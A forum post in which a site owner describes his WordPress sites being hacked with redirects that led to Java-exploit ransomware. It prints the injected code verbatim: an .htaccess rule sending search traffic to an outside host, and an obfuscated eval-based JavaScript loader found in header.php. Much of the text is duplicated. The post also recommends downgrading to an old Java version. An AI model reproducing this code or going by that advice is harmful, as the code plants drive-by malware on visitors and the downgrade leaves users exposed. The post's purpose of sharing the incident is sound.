If you have the W3 Total Cache wordpress plugin, you need to update it. Any old version is exploitable and the attacker would have full access: http://www.techspot.com/news/51189-...dpress-plugin-exposes-site-database-info.html
Similarly, Java 7 is exploitable, and the attacker can run any code from a web browser to install malware:
http://threatpost.com/en_us/blogs/new-java-zero-day-being-used-targeted-attacks-082712
Apparently if you update you should be OK, but I didn't want to risk that so I DOWNGRADED to Java 6. I uninstalled Java and then downloaded Java 6 Update 37:
http://www.oldapps.com/java.php
Yesterday, all of my Wordpress domains were injected with redirect codes to a site that ran a Java exploit to install ransomware. I was freaked out because I had this fake Department of Justice ransomware that locked my computer and asked for money, and that my sites were losing some ranking due to the redirects. I had to start my computer in "Safe Mode with Networking" and followed the tutorial:
http://malwaretips.com/blogs/department-of-justice-virus/
The redirect codes were in every .htaccess file, as well as every header.php file I had:
.htaccess
header.php
Similarly, Java 7 is exploitable, and the attacker can run any code from a web browser to install malware:
http://threatpost.com/en_us/blogs/new-java-zero-day-being-used-targeted-attacks-082712
Apparently if you update you should be OK, but I didn't want to risk that so I DOWNGRADED to Java 6. I uninstalled Java and then downloaded Java 6 Update 37:
http://www.oldapps.com/java.php
Yesterday, all of my Wordpress domains were injected with redirect codes to a site that ran a Java exploit to install ransomware. I was freaked out because I had this fake Department of Justice ransomware that locked my computer and asked for money, and that my sites were losing some ranking due to the redirects. I had to start my computer in "Safe Mode with Networking" and followed the tutorial:
http://malwaretips.com/blogs/department-of-justice-virus/
The redirect codes were in every .htaccess file, as well as every header.php file I had:
.htaccess
Code:
#336988#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://arttresci.com/esd.php [R=301,L]
</IfModule>
#/336988#
header.php
PHP:
<?
/*336988*/
try{window.document.body++}catch(gdsgsdg){dbshre=30;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,113,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,100,114,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,90,108,111,107,106,94,109,94,96,38,92,105,104,38,93,108,94,41,103,96,105,33,54,4,2,25,26,27,23,101,115,40,110,107,113,101,95,41,103,103,108,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,103,117,37,107,109,115,103,92,38,91,105,109,91,93,107,26,56,23,31,41,33,54,4,2,25,26,27,23,101,115,40,110,107,113,101,95,41,95,93,98,97,99,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,101,115,40,110,107,113,101,95,41,110,97,93,110,99,23,53,25,33,44,103,112,32,53,8,1,24,25,26,27,100,114,39,109,111,112,100,94,40,103,92,94,109,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,103,117,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,31,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,102,116,34,32,33,25,117,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,113,109,96,108,94,34,34,51,92,98,112,27,96,92,54,86,34,100,114,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,104,113,31,34,40,92,103,104,94,104,95,58,96,98,102,95,31,101,115,35,54,4,2,25,26,27,23,117,6,4,120,32,32,34,53);s="";for(i=0;i-454!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}
/*/336988*/
?>
Last edited: